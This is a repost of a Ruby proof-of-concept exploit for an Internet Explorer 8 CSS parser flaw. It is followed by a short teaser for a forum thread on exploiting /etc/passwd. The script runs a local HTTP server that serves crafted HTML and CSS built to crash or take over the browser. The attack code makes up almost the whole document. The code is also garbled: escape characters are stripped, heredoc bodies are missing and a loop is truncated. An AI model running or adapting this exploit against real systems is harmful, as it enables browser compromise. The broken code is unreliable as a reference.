Exp Internet Explorer 8 CSS Parser Exploit

#!/usr/bin/env ruby

# Source: http://www。breakingpointsystems。com/community/blog/ie-vulnerability/
# Author: Nephi Johnson (d0c_s4vage)

require 'socket'
 
def http_send(sock, data, opts={})
    defaults = {:code=>"200", :message=>"OK", :type=>"text/html"}
    opts = defaults.merge(opts)
    
    code = opts[:code]
    message = opts[:message]
    type = opts[:type]
    
    to_send = "HTTP/1.1 #{code} #{message}rn" +
              "Date: Sat, 11 Dec 2010 14:20:23 GMTrn" +
              "Cache-Control: no-cachern" +
              "Content-Type: #{type}rn" +
              "Pragma: no-cachern" +
              "Content-Length: #{data.length}rnrn" +
              "#{data}"
    puts "[+] Sending:"
    to_send.split("n").each do |line|
        puts "    #{line}"
    end
    sock.write(to_send) rescue return false
    return true
end
 
def sock_read(sock, out_str, timeout=5)
    begin
        if Kernel.select([sock],[],[],timeout)
            out_str.replace(sock.recv(1024))
            puts "[+] Received:"
            out_str.split("n").each do |line|
                puts "    #{line}"
            end
        else
            sock.close
            return false
        end
    rescue Exception => ex
        return false
    end
end
 
def to_uni(str)
    res = ""
    str.each_byte do |b|
        res
    end
    res
end
 
@css_name = "x00sx03sx00sx03sx00sx03sx00sx03s"
@html_name = "test.html"
placeholder = "a" * (@css_name.length/2)
 
@html =
   
HTML
@html = "xfexff" + to_uni(@html)
@html.gsub!(to_uni(placeholder), @css_name)
 
@css =
@import url("#{placeholder}");
@import url("#{placeholder}");
@import url("#{placeholder}");
@import url("#{placeholder}");
CSS
@css = "xfexff" + to_uni(@css)
@css.gsub!(to_uni(placeholder), @css_name)
 
@index =
#{@html_name}
INDEX
 
TCPServer.open(55555) do |srv|
    while true
        cli = srv.accept
        req = ""
        html = ""
        css = ""
        index = ""
        next unless sock_read(cli, req, 5)
        while req.length > 0
            if req =~ /GET/
                if req =~ /GET.*#{Regexp.escape(@html_name)}/
                    break unless http_send(cli, @html, :type=>"text/html")
                elsif req =~ /GET.*index/
                    break unless http_send(cli, @index)
                elsif req =~ /GET.*#{Regexp.escape(@css_name)}/
                    break unless http_send(cli, @css, :type=>"text/css")
                else
                    break unless http_send(cli, @css, :type=>"text/css")
                end
            elsif req =~ /QUIT/
                exit()
            end
            req = ""
            next unless sock_read(cli, req, 5)
        end
        cli.close rescue next
    end
end

文章来源于lcx.cc:Exp Internet Explorer 8 CSS Parser Exploit

相关推荐: 科普：etc/passwd怎么利用？为什么很多漏洞都扫描、读取etc/passwd文件呢？

求科普etc/passwd怎么利用 好基友一辈子 | 2014-05-06 16:33 看别人任意文件读取都是读passwd这个文件。 这个文件有什么用处？ 拿不到实际的权限吧 [原文地址] 各种吐槽： 1# BadCat (目前正在学习中.....) | 2…